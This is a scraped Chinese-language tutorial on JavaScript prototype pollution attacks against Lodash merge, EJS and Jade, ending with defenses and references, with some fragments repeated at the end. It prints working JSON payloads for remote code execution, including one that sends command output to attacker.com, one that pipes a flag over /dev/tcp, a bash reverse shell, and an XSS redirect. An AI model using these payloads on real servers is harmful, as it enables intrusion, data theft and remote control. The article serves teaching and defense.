JavaScript Prototype 污染攻击深度分析<\/h1>

前言<\/h2>
原型链污染(Prototype Pollution)是JavaScript中一种特殊的安全漏洞，攻击者通过修改对象的原型属性来影响应用程序的行为，可能导致从权限提升到远程代码执行等严重后果。本文将通过多个实际案例深入分析这种攻击方式。<\/p>

基本概念<\/h2>

JavaScript原型链机制<\/h3>
JavaScript中的每个对象都有一个内部属性`[[Prototype]]<\/code>(可通过proto<\/code>访问)，当访问对象属性时，如果对象本身没有该属性，JavaScript会沿着原型链向上查找。<\/p>`

原型链污染原理<\/h3>
当攻击者能够控制对象的属性，特别是能够修改__proto__<\/code>属性时，就可以污染所有继承自Object.prototype的对象，从而影响整个应用程序的行为。<\/p>
案例一：Lodash库的原型链污染<\/h2>
漏洞代码分析<\/h3>
const<\/span> lodash<\/span> =<\/span> require<\/span>('lodash'<\/span>)
<\/span><\/span>\/\/ ...
<\/span><\/span><\/span><\/span>data<\/span> =<\/span> lodash<\/span>.merge<\/span>(data<\/span>, req<\/span>.body<\/span>)
<\/span><\/span><\/code><\/pre>漏洞利用<\/h3>
Lodash的merge<\/code>函数存在原型链污染漏洞，攻击者可以构造特殊payload：<\/p>
{
<\/span><\/span>  "constructor"<\/span>: {
<\/span><\/span>    "prototype"<\/span>: {
<\/span><\/span>      "isAdmin"<\/span>: true<\/span>
<\/span><\/span>    }
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>或：<\/p>
{
<\/span><\/span>  "__proto__"<\/span>: {
<\/span><\/span>    "isAdmin"<\/span>: true<\/span>
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>深入利用：模板引擎RCE<\/h3>
通过污染sourceURL<\/code>属性实现远程代码执行：<\/p>
{
<\/span><\/span>  "__proto__"<\/span>: {
<\/span><\/span>    "sourceURL"<\/span>: "\nvar require = global.process.mainModule.constructor._load;var result = require('child_process').execSync('ls \/').toString();var req = require('http').request(`http:\/\/attacker.com\/${result}`);req.end()"<\/span>
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键点：<\/p>

利用lodash.template<\/code>中的Function<\/code>构造函数动态执行代码<\/li>
通过sourceURL<\/code>属性注入恶意代码<\/li>
使用global.process.mainModule.constructor._load<\/code>绕过require限制<\/li>
<\/ol>
案例二：EJS模板引擎的原型链污染<\/h2>
漏洞利用方式一：修改escapeFunction<\/h3>
{
<\/span><\/span>  "type"<\/span>: "test"<\/span>,
<\/span><\/span>  "content"<\/span>: {
<\/span><\/span>    "constructor"<\/span>: {
<\/span><\/span>      "prototype"<\/span>: {
<\/span><\/span>        "client"<\/span>: true<\/span>,
<\/span><\/span>        "escapeFunction"<\/span>: "1;return process.env.FLAG"<\/span>,
<\/span><\/span>        "compileDebug"<\/span>: true<\/span>
<\/span><\/span>      }
<\/span><\/span>    }
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞利用方式二：修改outputFunctionName<\/h3>
{
<\/span><\/span>  "type"<\/span>: "test"<\/span>,
<\/span><\/span>  "content"<\/span>: {
<\/span><\/span>    "constructor"<\/span>: {
<\/span><\/span>      "prototype"<\/span>: {
<\/span><\/span>        "outputFunctionName"<\/span>: "a=1;process.mainModule.require('child_process').exec('bash -c \"echo $FLAG>\/dev\/tcp\/xxxxx\/xx\"')"<\/span>
<\/span><\/span>      }
<\/span><\/span>    }
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞利用方式三：绕过认证+XSS<\/h3>

污染原型链使req.session.login<\/code>和req.session.userid<\/code>为true<\/li>
利用前端jQuery的$.extend<\/code>漏洞注入XSS payload<\/li>
通过修改content<\/code>属性实现XSS攻击：<\/li>
<\/ol>
$<\/span>("li[type='logger']"<\/span>).find<\/span>("span.content"<\/span>).html<\/span>("<script>window.location='http:\/\/attacker.com'<\/script>"<\/span>)
<\/span><\/span><\/code><\/pre>案例三：Jade模板引擎的原型链污染<\/h2>
漏洞利用<\/h3>
通过污染line<\/code>属性实现RCE：<\/p>
{
<\/span><\/span>  "__proto__"<\/span>: {
<\/span><\/span>    "compileDebug"<\/span>: 1<\/span>,
<\/span><\/span>    "self"<\/span>: 1<\/span>,
<\/span><\/span>    "line"<\/span>: "global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& \/dev\/tcp\/ip\/port 0>&1\"')"<\/span>
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键点：<\/p>

Jade在编译模板时会使用new Function()<\/code>动态执行代码<\/li>
通过污染line<\/code>属性注入恶意代码<\/li>
compileDebug<\/code>和self<\/code>属性用于控制执行流程<\/li>
<\/ol>
防御措施<\/h2>

对象冻结<\/strong>：使用Object.freeze(Object.prototype)<\/code>冻结原型<\/li>
属性过滤<\/strong>：避免将用户输入直接合并到对象中<\/li>
使用安全版本<\/strong>：更新易受攻击的库版本<\/li>
Schema验证<\/strong>：对用户输入进行严格的Schema验证<\/li>
使用无原型对象<\/strong>：创建对象时使用Object.create(null)<\/code><\/li>
<\/ol>
总结<\/h2>
原型链污染是一种危险的JavaScript漏洞，影响许多流行的库和框架。攻击者通过控制对象原型可以影响应用程序的全局行为，甚至实现远程代码执行。开发者应了解这种攻击的原理，并在代码中实施适当的防御措施。<\/p>
参考资源<\/h2>

Prototype Pollution攻击的分析与利用<\/a><\/li>
Prototype Pollution攻击笔记<\/a><\/li>
JavaScript原型链污染攻击<\/a><\/li>
<\/ol>

JavaScript Prototype 污染攻击深度分析<\/h1>

基本概念<\/h2>

JavaScript原型链机制<\/h3> JavaScript中的每个对象都有一个内部属性[[Prototype]]<\/code>(可通过__proto__<\/code>访问)，当访问对象属性时，如果对象本身没有该属性，JavaScript会沿着原型链向上查找。<\/p>

案例二：EJS模板引擎的原型链污染<\/h2>

案例三：Jade模板引擎的原型链污染<\/h2>

参考资源<\/h2> Prototype Pollution攻击的分析与利用<\/a><\/li> Prototype Pollution攻击笔记<\/a><\/li> JavaScript原型链污染攻击<\/a><\/li> <\/ol>

JavaScript原型链机制<\/h3>
JavaScript中的每个对象都有一个内部属性`[[Prototype]]<\/code>(可通过proto<\/code>访问)，当访问对象属性时，如果对象本身没有该属性，JavaScript会沿着原型链向上查找。<\/p>`

参考资源<\/h2>

Prototype Pollution攻击的分析与利用<\/a><\/li>
Prototype Pollution攻击笔记<\/a><\/li>
JavaScript原型链污染攻击<\/a><\/li> <\/ol>